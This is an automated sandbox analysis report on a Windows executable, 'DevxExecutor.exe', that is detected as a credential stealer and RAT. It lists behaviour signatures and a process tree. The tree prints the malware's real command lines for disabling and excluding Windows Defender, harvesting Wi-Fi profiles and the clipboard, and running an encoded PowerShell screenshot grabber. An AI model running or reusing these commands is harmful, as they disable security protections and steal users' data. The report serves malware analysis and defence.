Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DevxExecutor.exe

Overview

General Information

Sample name:DevxExecutor.exe
Analysis ID:1439028
MD5:e4897ef7419e128b1f7473119ce0bd07
SHA1:5aad252412a5923438f30cb9c397731a9b020121
SHA256:6d5ba38a5e9bde7939ac5dcb8fdcb970701168064d30abcf518cf8d272a0f581
Tags:exe
Infos:

Detection

Python Stealer, Blank Grabber, CStealer, Discord Token Stealer, Millenuim RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected CStealer
Yara detected Discord Token Stealer
Yara detected Millenuim RAT
Yara detected Telegram RAT
Yara detected Telegram Recon
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Drops PE files with benign system names
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found pyInstaller with non standard icon
Hides threads from debuggers
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Potentially malicious time measurement code found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Very long command line found
Writes or reads registry keys via WMI
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Python Stealer
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Too many similar processes found
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • DevxExecutor.exe (PID: 320 cmdline: "C:\Users\user\Desktop\DevxExecutor.exe" MD5: E4897EF7419E128B1F7473119CE0BD07)
    • cstealer.exe (PID: 3856 cmdline: "C:\Users\user\AppData\Local\Temp\cstealer.exe" MD5: BC2B7DE582FB94F0C44855D8FAB8C236)
      • cstealer.exe (PID: 6608 cmdline: "C:\Users\user\AppData\Local\Temp\cstealer.exe" MD5: BC2B7DE582FB94F0C44855D8FAB8C236)
        • cmd.exe (PID: 6292 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 2272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cstealer.exe (PID: 1128 cmdline: "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet MD5: BC2B7DE582FB94F0C44855D8FAB8C236)
            • cstealer.exe (PID: 3292 cmdline: "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet MD5: BC2B7DE582FB94F0C44855D8FAB8C236)
              • cmd.exe (PID: 5700 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 1776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • cstealer.exe (PID: 5364 cmdline: "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet MD5: BC2B7DE582FB94F0C44855D8FAB8C236)
                  • cstealer.exe (PID: 2848 cmdline: "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet MD5: BC2B7DE582FB94F0C44855D8FAB8C236)
                    • cmd.exe (PID: 7448 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                      • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • cstealer.exe (PID: 7788 cmdline: "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet MD5: BC2B7DE582FB94F0C44855D8FAB8C236)
                        • cstealer.exe (PID: 7880 cmdline: "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet MD5: BC2B7DE582FB94F0C44855D8FAB8C236)
                          • cmd.exe (PID: 8604 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                            • conhost.exe (PID: 8624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                            • cstealer.exe (PID: 8668 cmdline: "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet MD5: BC2B7DE582FB94F0C44855D8FAB8C236)
                              • cstealer.exe (PID: 7328 cmdline: "C:\Users\user\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet MD5: BC2B7DE582FB94F0C44855D8FAB8C236)
    • main.exe (PID: 6720 cmdline: "C:\Users\user\AppData\Local\Temp\main.exe" MD5: 1EE0837EEDF03E82AA652B1BF157387F)
      • main.exe (PID: 7060 cmdline: "C:\Users\user\AppData\Local\Temp\main.exe" MD5: 1EE0837EEDF03E82AA652B1BF157387F)
        • cmd.exe (PID: 1880 cmdline: C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe -pbeznogym MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Build.exe (PID: 2696 cmdline: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe -pbeznogym MD5: A1DDA0E77B597A95DC0D894A4D28780A)
            • hacn.exe (PID: 4768 cmdline: "C:\ProgramData\Microsoft\hacn.exe" MD5: B9F3E6E06F33EE7078F514D41BE5FAAD)
              • hacn.exe (PID: 6284 cmdline: "C:\ProgramData\Microsoft\hacn.exe" MD5: B9F3E6E06F33EE7078F514D41BE5FAAD)
                • cmd.exe (PID: 2284 cmdline: C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe -pbeznogym MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 5136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                    • Conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • s.exe (PID: 6728 cmdline: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe -pbeznogym MD5: 8198AD352AB70C2C974AB5C716956CD7)
                    • main.exe (PID: 7796 cmdline: "C:\ProgramData\main.exe" MD5: 5DF3E2C717F267899F37EC6E8FC7F47A)
                      • cmd.exe (PID: 9112 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp7F1E.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp7F1E.tmp.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                        • conhost.exe (PID: 9124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                        • tasklist.exe (PID: 9184 cmdline: Tasklist /fi "PID eq 7796" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                        • find.exe (PID: 9208 cmdline: find ":" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
                    • svchost.exe (PID: 8076 cmdline: "C:\ProgramData\svchost.exe" MD5: 48B277A9AC4E729F9262DD9F7055C422)
                      • svchost.exe (PID: 8832 cmdline: "C:\ProgramData\svchost.exe" MD5: 48B277A9AC4E729F9262DD9F7055C422)
                        • cmd.exe (PID: 8100 cmdline: C:\Windows\system32\cmd.exe /c "ver" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                    • setup.exe (PID: 8164 cmdline: "C:\ProgramData\setup.exe" MD5: 1274CBCD6329098F79A3BE6D76AB8B97)
            • based.exe (PID: 1472 cmdline: "C:\ProgramData\Microsoft\based.exe" MD5: A71FC3CA1BD1AF148EE4C1BFABCBE0DA)
              • based.exe (PID: 4292 cmdline: "C:\ProgramData\Microsoft\based.exe" MD5: A71FC3CA1BD1AF148EE4C1BFABCBE0DA)
                • cmd.exe (PID: 4128 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 6628 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
                    • Conhost.exe (PID: 7824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • cmd.exe (PID: 5036 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 1080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 2172 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 5328 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You are using the wrong Windows version or a VM got detected!', 0, 'Info!', 48+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 2696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • mshta.exe (PID: 7188 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('You are using the wrong Windows version or a VM got detected!', 0, 'Info!', 48+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
                • cmd.exe (PID: 7208 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 7344 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 7504 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 7728 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                • cmd.exe (PID: 7528 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 7720 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                • cmd.exe (PID: 7904 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • WMIC.exe (PID: 7956 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
                • cmd.exe (PID: 7968 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 8056 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • Conhost.exe (PID: 5956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • cmd.exe (PID: 8012 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tasklist.exe (PID: 6612 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
                • cmd.exe (PID: 3780 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 8228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • netsh.exe (PID: 8468 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
                • cmd.exe (PID: 1252 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 8236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tree.com (PID: 8428 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
                • cmd.exe (PID: 8196 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 8248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • systeminfo.exe (PID: 8460 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
                • cmd.exe (PID: 8680 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 8704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 8824 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AY